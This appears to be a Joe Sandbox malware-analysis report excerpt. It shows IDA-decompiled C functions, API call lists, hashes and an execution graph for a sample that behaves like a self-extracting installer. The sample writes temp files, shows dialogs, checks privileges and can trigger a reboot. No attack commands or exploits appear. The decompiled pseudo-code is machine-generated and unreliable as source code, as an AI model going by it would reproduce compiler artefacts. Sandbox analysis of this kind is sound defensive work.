                                                                      0x011d6477
                                                                      0x011d6477
                                                                      0x011d647a
                                                                      0x011d643a
                                                                      0x011d643a
                                                                      0x011d6444
                                                                      0x011d6444
                                                                      0x011d6492

                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D642D
                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D645B
                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D647A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D63EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1065093856-2312194364
                                                                      • Opcode ID: 1cba17c8596892f8b92c95a9f03c851652e0bc732bbcf4b7b5f99ab1799f4cd9
                                                                      • Instruction ID: 7af8c3a840aed59a8a269bd015a092064f4c2a9b9f27dc919972f4248689afd2
                                                                      • Opcode Fuzzy Hash: 1cba17c8596892f8b92c95a9f03c851652e0bc732bbcf4b7b5f99ab1799f4cd9
                                                                      • Instruction Fuzzy Hash: 352102B1A0121CABDB28DF25DCC5FEB7768EB45314F0001A9E594A3280CBB46DC4CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E011D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                      				struct HRSRC__* _t6;
                                                                      				void* _t21;
                                                                      				struct HINSTANCE__* _t23;
                                                                      				int _t24;
                                                                      
                                                                      				_t23 =  *0x11d9a3c; // 0x11d0000
                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                      				if(_t6 == 0) {
                                                                      					L6:
                                                                      					E011D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                      					_t24 = _a16;
                                                                      				} else {
                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						if(_a12 != 0) {
                                                                      							_push(_a12);
                                                                      						} else {
                                                                      							_push(0);
                                                                      						}
                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                      						FreeResource(_t21);
                                                                      						if(_t24 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t24;
                                                                      			}







                                                                      0x011d651f
                                                                      0x011d652a
                                                                      0x011d6534
                                                                      0x011d656b
                                                                      0x011d6577
                                                                      0x011d657c
                                                                      0x011d6536
                                                                      0x011d653e
                                                                      0x011d6542
                                                                      0x00000000
                                                                      0x011d6544
                                                                      0x011d6547
                                                                      0x011d654c
                                                                      0x011d6549
                                                                      0x011d6549
                                                                      0x011d6549
                                                                      0x011d655e
                                                                      0x011d6560
                                                                      0x011d6569
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d6569
                                                                      0x011d6542
                                                                      0x011d6587

                                                                      APIs
                                                                      • FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                      • LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                      • DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                      • FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: 2267f82c27f10b85e0344a0d88d57cf7587881f8dc9ce1666acbd03978781fb6
                                                                      • Instruction ID: c6baa9121389e1ee66c8dba581e9e1c4ee8814ce195f2e38b225a32777a288f0
                                                                      • Opcode Fuzzy Hash: 2267f82c27f10b85e0344a0d88d57cf7587881f8dc9ce1666acbd03978781fb6
                                                                      • Instruction Fuzzy Hash: 0D01D672102619BBDF299EA9AC48DBB7B6CEF857A1B410125FE2093144D7719D90C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3680(void* __ecx) {
                                                                      				void* _v8;
                                                                      				struct tagMSG _v36;
                                                                      				int _t8;
                                                                      				struct HWND__* _t16;
                                                                      
                                                                      				_v8 = __ecx;
                                                                      				_t16 = 0;
                                                                      				while(1) {
                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                      					if(_t8 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						do {
                                                                      							if(_v36.message != 0x12) {
                                                                      								DispatchMessageA( &_v36);
                                                                      							} else {
                                                                      								_t16 = 1;
                                                                      							}
                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                      						} while (_t8 != 0);
                                                                      						if(_t16 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return _t8;
                                                                      			}







                                                                      0x011d368c
                                                                      0x011d368f
                                                                      0x011d3691
                                                                      0x011d369f
                                                                      0x011d36a7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d36ba
                                                                      0x00000000
                                                                      0x011d36bc
                                                                      0x011d36bc
                                                                      0x011d36c0
                                                                      0x011d36cb
                                                                      0x011d36c2
                                                                      0x011d36c4
                                                                      0x011d36c4
                                                                      0x011d36da
                                                                      0x011d36e0
                                                                      0x011d36e6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d36e6
                                                                      0x00000000
                                                                      0x011d36ba
                                                                      0x011d36ed

                                                                      APIs
                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011D369F
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36B2
                                                                      • DispatchMessageA.USER32(?), ref: 011D36CB
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      • Opcode ID: 9aac7dcec7596964128ebf8f28c77fa6551d51289b92ef4ed9fcd0a2d952060a
                                                                      • Instruction ID: 345e87135eda8a33976c65ee19ae1c51441fea87740507262602313098ab82f5
                                                                      • Opcode Fuzzy Hash: 9aac7dcec7596964128ebf8f28c77fa6551d51289b92ef4ed9fcd0a2d952060a
                                                                      • Instruction Fuzzy Hash: 690167B291125577DB348AAA6C4CEEB7A7CFBC6B10F040129FA25E3184D661C684C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E011D65E8(char* __ecx) {
                                                                      				char _t3;
                                                                      				char _t10;
                                                                      				char* _t12;
                                                                      				char* _t14;
                                                                      				char* _t15;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t12 = __ecx;
                                                                      				_t15 = __ecx;
                                                                      				_t14 =  &(__ecx[1]);
                                                                      				_t10 = 0;
                                                                      				do {
                                                                      					_t3 =  *_t12;
                                                                      					_t12 =  &(_t12[1]);
                                                                      				} while (_t3 != 0);
                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                      				while(1) {
                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                      					if(_t16 <= _t15) {
                                                                      						break;
                                                                      					}
                                                                      					if( *_t16 == 0x5c) {
                                                                      						L7:
                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                      							_t16 = CharNextA(_t16);
                                                                      						}
                                                                      						 *_t16 = _t10;
                                                                      						_t10 = 1;
                                                                      					} else {
                                                                      						_push(_t16);
                                                                      						continue;
                                                                      					}
                                                                      					L11:
                                                                      					return _t10;
                                                                      				}
                                                                      				if( *_t16 == 0x5c) {
                                                                      					goto L7;
                                                                      				}
                                                                      				goto L11;
                                                                      			}









                                                                      0x011d65e8
                                                                      0x011d65ed
                                                                      0x011d65ef
                                                                      0x011d65f2
                                                                      0x011d65f4
                                                                      0x011d65f4
                                                                      0x011d65f6
                                                                      0x011d65f7
                                                                      0x011d6608
                                                                      0x011d6611
                                                                      0x011d6618
                                                                      0x011d661c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d660e
                                                                      0x011d6623
                                                                      0x011d6625
                                                                      0x011d663b
                                                                      0x011d663b
                                                                      0x011d663d
                                                                      0x011d6641
                                                                      0x011d6610
                                                                      0x011d6610
                                                                      0x00000000
                                                                      0x011d6610
                                                                      0x011d6644
                                                                      0x011d6647
                                                                      0x011d6647
                                                                      0x011d6621
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,011D2B33), ref: 011D6602
                                                                      • CharPrevA.USER32(?,00000000), ref: 011D6612
                                                                      • CharPrevA.USER32(?,00000000), ref: 011D6629
                                                                      • CharNextA.USER32(00000000), ref: 011D6635
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      • Opcode ID: 75cb88f93ae635d2a91cdc94dcbc944b048a1b06491b385a1ff839ac70db6503
                                                                      • Instruction ID: c538871c46ea703c81600805465a60ca658c771866dda20494495986356b013e
                                                                      • Opcode Fuzzy Hash: 75cb88f93ae635d2a91cdc94dcbc944b048a1b06491b385a1ff839ac70db6503
                                                                      • Instruction Fuzzy Hash: 3FF028320061606EE73B4E3C9C888BBBF9CCF8B19471901BFE5A183001D7150A86C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D69B0() {
                                                                      				intOrPtr* _t4;
                                                                      				intOrPtr* _t5;
                                                                      				void* _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      
                                                                      				 *0x11d81f8 = E011D6C70();
                                                                      				__set_app_type(E011D6FBE(2));
                                                                      				 *0x11d88a4 =  *0x11d88a4 | 0xffffffff;
                                                                      				 *0x11d88a8 =  *0x11d88a8 | 0xffffffff;
                                                                      				_t4 = __p__fmode();
                                                                      				_t11 =  *0x11d8528; // 0x0
                                                                      				 *_t4 = _t11;
                                                                      				_t5 = __p__commode();
                                                                      				_t12 =  *0x11d851c; // 0x0
                                                                      				 *_t5 = _t12;
                                                                      				_t6 = E011D7000();
                                                                      				if( *0x11d8000 == 0) {
                                                                      					__setusermatherr(E011D7000);
                                                                      				}
                                                                      				E011D71EF(_t6);
                                                                      				return 0;
                                                                      			}








                                                                      0x011d69b7
                                                                      0x011d69c2
                                                                      0x011d69c8
                                                                      0x011d69cf
                                                                      0x011d69d8
                                                                      0x011d69de
                                                                      0x011d69e4
                                                                      0x011d69e6
                                                                      0x011d69ec
                                                                      0x011d69f2
                                                                      0x011d69f4
                                                                      0x011d6a00
                                                                      0x011d6a07
                                                                      0x011d6a0d
                                                                      0x011d6a0e
                                                                      0x011d6a15

                                                                      APIs
                                                                        • Part of subcall function 011D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 011D6FC5
                                                                      • __set_app_type.MSVCRT ref: 011D69C2
                                                                      • __p__fmode.MSVCRT ref: 011D69D8
                                                                      • __p__commode.MSVCRT ref: 011D69E6
                                                                      • __setusermatherr.MSVCRT ref: 011D6A07
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: 03beb55f843d125f16ebe8b07d097d53592d5bef2518dcd612903b9c3548e362
                                                                      • Instruction ID: 07b051164180db300c43588988e7dc2e3b73de53cca23172686ea59d8c1a55c5
                                                                      • Opcode Fuzzy Hash: 03beb55f843d125f16ebe8b07d097d53592d5bef2518dcd612903b9c3548e362
                                                                      • Instruction Fuzzy Hash: B1F015745073228FCB3DAB36F50A6093BA1FB15339B104629E4B2862D8CF3A85C0CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:26.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:969
                                                                      Total number of Limit Nodes:43
                                                                      execution_graph 3128 f86ef0 3129 f86f2d 3128->3129 3131 f86f02 3128->3131 3130 f86f27 ?terminate@ 3130->3129 3131->3129 3131->3130 3132 f834f0 3133 f83504 3132->3133 3137 f835b8 3132->3137 3134 f8351b 3133->3134 3135 f835be GetDesktopWindow 3133->3135 3133->3137 3139 f8354f 3134->3139 3140 f8351f 3134->3140 3154 f843d0 6 API calls 3135->3154 3136 f83526 3137->3136 3141 f83671 EndDialog 3137->3141 3139->3136 3144 f83559 ResetEvent 3139->3144 3140->3136 3143 f8352d TerminateThread EndDialog 3140->3143 3141->3136 3143->3136 3147 f844b9 20 API calls 3144->3147 3145 f8361d SetWindowTextA CreateThread 3145->3136 3148 f83646 3145->3148 3146 f835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3146->3145 3149 f83581 3147->3149 3150 f844b9 20 API calls 3148->3150 3151 f8359b SetEvent 3149->3151 3153 f8358a SetEvent 3149->3153 3150->3137 3152 f83680 4 API calls 3151->3152 3152->3137 3153->3136 3155 f84463 SetWindowPos 3154->3155 3157 f86ce0 4 API calls 3155->3157 3158 f835d6 3157->3158 3158->3145 3158->3146 3159 f869b0 3160 f869b5 3159->3160 3168 f86fbe GetModuleHandleW 3160->3168 3162 f869c1 __set_app_type __p__fmode __p__commode 3163 f869f9 3162->3163 3164 f86a0e 3163->3164 3165 f86a02 __setusermatherr 3163->3165 3170 f871ef _controlfp 3164->3170 3165->3164 3167 f86a13 3169 f86fcf 3168->3169 3169->3162 3170->3167 3171 f87270 _except_handler4_common 3172 f86bef _XcptFilter 2196 f86a60 2213 f87155 2196->2213 2198 f86a65 2199 f86a76 GetStartupInfoW 2198->2199 2200 f86a93 2199->2200 2201 f86aa8 2200->2201 2202 f86aaf Sleep 2200->2202 2203 f86ac7 _amsg_exit 2201->2203 2205 f86ad1 2201->2205 2202->2200 2203->2205 2204 f86b13 _initterm 2208 f86b2e __IsNonwritableInCurrentImage 2204->2208 2205->2204 2207 f86af4 2205->2207 2205->2208 2206 f86bd6 _ismbblead 2206->2208 2208->2206 2210 f86c1e 2208->2210 2211 f86bbe exit 2208->2211 2218 f82bfb GetVersion 2208->2218 2210->2207 2212 f86c27 _cexit 2210->2212 2211->2208 2212->2207 2214 f8717a 2213->2214 2215 f8717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2213->2215 2214->2215 2216 f871e2 2214->2216 2217 f871cd 2215->2217 2216->2198 2217->2216 2219 f82c0f 2218->2219 2220 f82c50 2218->2220 2219->2220 2222 f82c13 GetModuleHandleW 2219->2222 2235 f82caa memset memset memset 2220->2235 2222->2220 2224 f82c22 GetProcAddress 2222->2224 2224->2220 2232 f82c34 2224->2232 2225 f82c8e 2227 f82c9e 2225->2227 2228 f82c97 CloseHandle 2225->2228 2227->2208 2228->2227 2232->2220 2233 f82c89 2330 f81f90 2233->2330 2347 f8468f FindResourceA SizeofResource 2235->2347 2238 f82e30 2241 f844b9 20 API calls 2238->2241 2239 f82d2d CreateEventA SetEvent 2240 f8468f 7 API calls 2239->2240 2242 f82d57 2240->2242 2243 f82f06 2241->2243 2244 f82d5b 2242->2244 2245 f82d7d 2242->2245 2352 f86ce0 2243->2352 2357 f844b9 2244->2357 2247 f82e1f 2245->2247 2250 f8468f 7 API calls 2245->2250 2386 f85c9e 2247->2386 2252 f82d9f 2250->2252 2251 f82c62 2251->2225 2276 f82f1d 2251->2276 2252->2244 2254 f82da3 CreateMutexA 2252->2254 2254->2247 2258 f82dbd GetLastError 2254->2258 2255 f82e3a 2256 f82e52 FindResourceA 2255->2256 2257 f82e43 2255->2257 2261 f82e6e 2256->2261 2262 f82e64 LoadResource 2256->2262 2412 f82390 2257->2412 2258->2247 2260 f82dca 2258->2260 2263 f82dea 2260->2263 2264 f82dd5 2260->2264 2267 f82d6e 2261->2267 2427 f836ee GetVersionExA 2261->2427 2262->2261 2266 f844b9 20 API calls 2263->2266 2265 f844b9 20 API calls 2264->2265 2268 f82de8 2265->2268 2269 f82dff 2266->2269 2267->2243 2271 f82e04 CloseHandle 2268->2271 2269->2247 2269->2271 2271->2243 2277 f82f6c 2276->2277 2278 f82f3f 2276->2278 2571 f85164 2277->2571 2280 f82f5f 2278->2280 2551 f851e5 2278->2551 2704 f83a3f 2280->2704 2282 f82f71 2312 f83041 2282->2312 2586 f855a0 2282->2586 2288 f86ce0 4 API calls 2290 f82c6b 2288->2290 2289 f82f86 GetSystemDirectoryA 2291 f8658a CharPrevA 2289->2291 2317 f852b6 2290->2317 2292 f82fab LoadLibraryA 2291->2292 2293 f82fc0 GetProcAddress 2292->2293 2294 f82ff7 FreeLibrary 2292->2294 2293->2294 2297 f82fd6 DecryptFileA 2293->2297 2295 f83006 2294->2295 2296 f83017 SetCurrentDirectoryA 2294->2296 2295->2296 2636 f8621e GetWindowsDirectoryA 2295->2636 2298 f83054 2296->2298 2299 f83026 2296->2299 2297->2294 2308 f82ff0 2297->2308 2300 f83061 2298->2300 2647 f83b26 2298->2647 2302 f844b9 20 API calls 2299->2302 2305 f8307a 2300->2305 2300->2312 2656 f8256d 2300->2656 2307 f83037 2302->2307 2316 f83098 2305->2316 2667 f83ba2 2305->2667 2723 f86285 GetLastError 2307->2723 2308->2294 2312->2288 2314 f830af 2725 f84169 2314->2725 2316->2312 2316->2314 2318 f852d6 2317->2318 2319 f85316 2317->2319 2321 f85300 LocalFree LocalFree 2318->2321 2324 f852eb SetFileAttributesA DeleteFileA 2318->2324 2323 f85374 2319->2323 2327 f8535e SetCurrentDirectoryA 2319->2327 2328 f865e8 4 API calls 2319->2328 2320 f8538c 2322 f86ce0 4 API calls 2320->2322 2321->2318 2321->2319 2325 f82c72 2322->2325 2323->2320 3058 f81fe1 2323->3058 2324->2321 2325->2225 2325->2233 2329 f82390 13 API calls 2327->2329 2328->2327 2329->2323 2331 f81f9a 2330->2331 2335 f81f9f 2330->2335 2332 f81ea7 15 API calls 2331->2332 2332->2335 2333 f81ee2 GetCurrentProcess OpenProcessToken 2340 f81f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2333->2340 2342 f81f0e 2333->2342 2334 f81fcf ExitWindowsEx 2338 f81fd9 2334->2338 2336 f844b9 20 API calls 2335->2336 2337 f81fc0 2335->2337 2335->2338 2336->2337 2337->2333 2337->2334 2337->2338 2338->2225 2341 f81f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 f81f1f 2341->2343 2344 f844b9 20 API calls 2342->2344 2345 f86ce0 4 API calls 2343->2345 2344->2343 2346 f81f8c 2345->2346 2346->2225 2348 f82d1a 2347->2348 2349 f846b6 2347->2349 2348->2238 2348->2239 2349->2348 2350 f846be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 f846df memcpy_s FreeResource 2350->2351 2351->2348 2353 f86ce8 2352->2353 2354 f86ceb 2352->2354 2353->2251 2469 f86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 f86e26 2356->2251 2358 f8455a 2357->2358 2359 f844fe LoadStringA 2357->2359 2363 f86ce0 4 API calls 2358->2363 2360 f84562 2359->2360 2361 f84527 2359->2361 2367 f845c9 2360->2367 2374 f8457e 2360->2374 2470 f8681f 2361->2470 2365 f84689 2363->2365 2365->2267 2366 f84536 MessageBoxA 2366->2358 2369 f845cd LocalAlloc 2367->2369 2370 f84607 LocalAlloc 2367->2370 2369->2358 2376 f845f3 2369->2376 2370->2358 2372 f845c4 2370->2372 2377 f8462d MessageBeep 2372->2377 2374->2374 2375 f84596 LocalAlloc 2374->2375 2375->2358 2378 f845af 2375->2378 2379 f8171e _vsnprintf 2376->2379 2380 f8681f 10 API calls 2377->2380 2487 f8171e 2378->2487 2379->2372 2381 f8463b 2380->2381 2383 f84645 MessageBoxA LocalFree 2381->2383 2384 f867c9 EnumResourceLanguagesA 2381->2384 2383->2358 2384->2383 2393 f85e17 2386->2393 2410 f85cc3 2386->2410 2387 f85dd0 2391 f85dec GetModuleFileNameA 2387->2391 2387->2393 2388 f86ce0 4 API calls 2390 f82e2c 2388->2390 2389 f85ced CharNextA 2389->2410 2390->2238 2390->2255 2392 f85e0a 2391->2392 2391->2393 2497 f866c8 2392->2497 2393->2388 2395 f86218 2506 f86e2a 2395->2506 2398 f85e36 CharUpperA 2399 f861d0 2398->2399 2398->2410 2400 f844b9 20 API calls 2399->2400 2401 f861e7 2400->2401 2402 f861f0 CloseHandle 2401->2402 2403 f861f7 ExitProcess 2401->2403 2402->2403 2404 f85f9f CharUpperA 2404->2410 2405 f86003 CharUpperA 2405->2410 2406 f8667f IsDBCSLeadByte CharNextA 2406->2410 2407 f85f59 CompareStringA 2407->2410 2408 f85edc CharUpperA 2408->2410 2409 f860a2 CharUpperA 2409->2410 2410->2387 2410->2389 2410->2393 2410->2395 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2502 f8658a 2410->2502 2413 f824cb 2412->2413 2416 f823b9 2412->2416 2414 f86ce0 4 API calls 2413->2414 2415 f824dc 2414->2415 2415->2267 2416->2413 2417 f823e9 FindFirstFileA 2416->2417 2417->2413 2425 f82407 2417->2425 2418 f82479 2422 f82488 SetFileAttributesA DeleteFileA 2418->2422 2419 f82421 lstrcmpA 2420 f824a9 FindNextFileA 2419->2420 2421 f82431 lstrcmpA 2419->2421 2423 f824bd FindClose RemoveDirectoryA 2420->2423 2420->2425 2421->2420 2421->2425 2422->2420 2423->2413 2424 f8658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2420 2425->2424 2426 f82390 5 API calls 2425->2426 2426->2425 2428 f8372d 2427->2428 2429 f83737 2427->2429 2430 f844b9 20 API calls 2428->2430 2441 f839fc 2428->2441 2429->2428 2434 f838a4 2429->2434 2429->2441 2513 f828e8 2429->2513 2430->2441 2431 f86ce0 4 API calls 2432 f82e92 2431->2432 2432->2243 2432->2267 2442 f818a3 2432->2442 2434->2428 2435 f839c1 MessageBeep 2434->2435 2434->2441 2436 f8681f 10 API calls 2435->2436 2437 f839ce 2436->2437 2438 f839d8 MessageBoxA 2437->2438 2440 f867c9 EnumResourceLanguagesA 2437->2440 2438->2441 2440->2438 2441->2431 2443 f819b8 2442->2443 2444 f818d5 2442->2444 2446 f86ce0 4 API calls 2443->2446 2542 f817ee LoadLibraryA 2444->2542 2448 f819d5 2446->2448 2448->2267 2462 f86517 FindResourceA 2448->2462 2449 f818e5 GetCurrentProcess OpenProcessToken 2449->2443 2450 f81900 GetTokenInformation 2449->2450 2451 f81918 GetLastError 2450->2451 2452 f819aa CloseHandle 2450->2452 2451->2452 2453 f81927 LocalAlloc 2451->2453 2452->2443 2454 f81938 GetTokenInformation 2453->2454 2455 f819a9 2453->2455 2456 f8194e AllocateAndInitializeSid 2454->2456 2457 f819a2 LocalFree 2454->2457 2455->2452 2456->2457 2461 f8196e 2456->2461 2457->2455 2458 f81999 FreeSid 2458->2457 2459 f81975 EqualSid 2460 f8198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 f8656b 2462->2463 2464 f86536 LoadResource 2462->2464 2465 f844b9 20 API calls 2463->2465 2464->2463 2466 f86544 DialogBoxIndirectParamA FreeResource 2464->2466 2467 f8657c 2465->2467 2466->2463 2466->2467 2467->2267 2469->2356 2471 f86857 GetVersionExA 2470->2471 2480 f8691a 2470->2480 2473 f8687c 2471->2473 2471->2480 2472 f86ce0 4 API calls 2474 f8452c 2472->2474 2475 f868a5 GetSystemMetrics 2473->2475 2473->2480 2474->2366 2481 f867c9 2474->2481 2476 f868b5 RegOpenKeyExA 2475->2476 2475->2480 2477 f868d6 RegQueryValueExA RegCloseKey 2476->2477 2476->2480 2478 f8690c 2477->2478 2477->2480 2491 f866f9 2478->2491 2480->2472 2482 f867e2 2481->2482 2483 f86803 2481->2483 2495 f86793 EnumResourceLanguagesA 2482->2495 2483->2366 2485 f867f5 2485->2483 2496 f86793 EnumResourceLanguagesA 2485->2496 2488 f8172d 2487->2488 2489 f8173d _vsnprintf 2488->2489 2490 f8175d 2488->2490 2489->2490 2490->2372 2492 f8670f 2491->2492 2493 f86740 CharNextA 2492->2493 2494 f8674b 2492->2494 2493->2492 2494->2480 2495->2485 2496->2483 2498 f866d5 2497->2498 2499 f866f3 2498->2499 2501 f866e5 CharNextA 2498->2501 2509 f86648 2498->2509 2499->2393 2501->2498 2503 f8659b 2502->2503 2503->2503 2504 f865b8 CharPrevA 2503->2504 2505 f865ab 2503->2505 2504->2505 2505->2410 2512 f86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2506->2512 2508 f8621d 2510 f8665d IsDBCSLeadByte 2509->2510 2511 f86668 2509->2511 2510->2511 2511->2498 2512->2508 2514 f82a62 2513->2514 2521 f8290d 2513->2521 2516 f82a6e GlobalFree 2514->2516 2517 f82a75 2514->2517 2516->2517 2517->2434 2518 f82955 GlobalAlloc 2518->2514 2519 f82968 GlobalLock 2518->2519 2519->2514 2519->2521 2520 f82a20 GlobalUnlock 2520->2521 2521->2514 2521->2518 2521->2520 2522 f82a80 GlobalUnlock 2521->2522 2523 f82773 2521->2523 2522->2514 2524 f828b2 2523->2524 2525 f827a3 CharUpperA CharNextA CharNextA 2523->2525 2527 f828b7 GetSystemDirectoryA 2524->2527 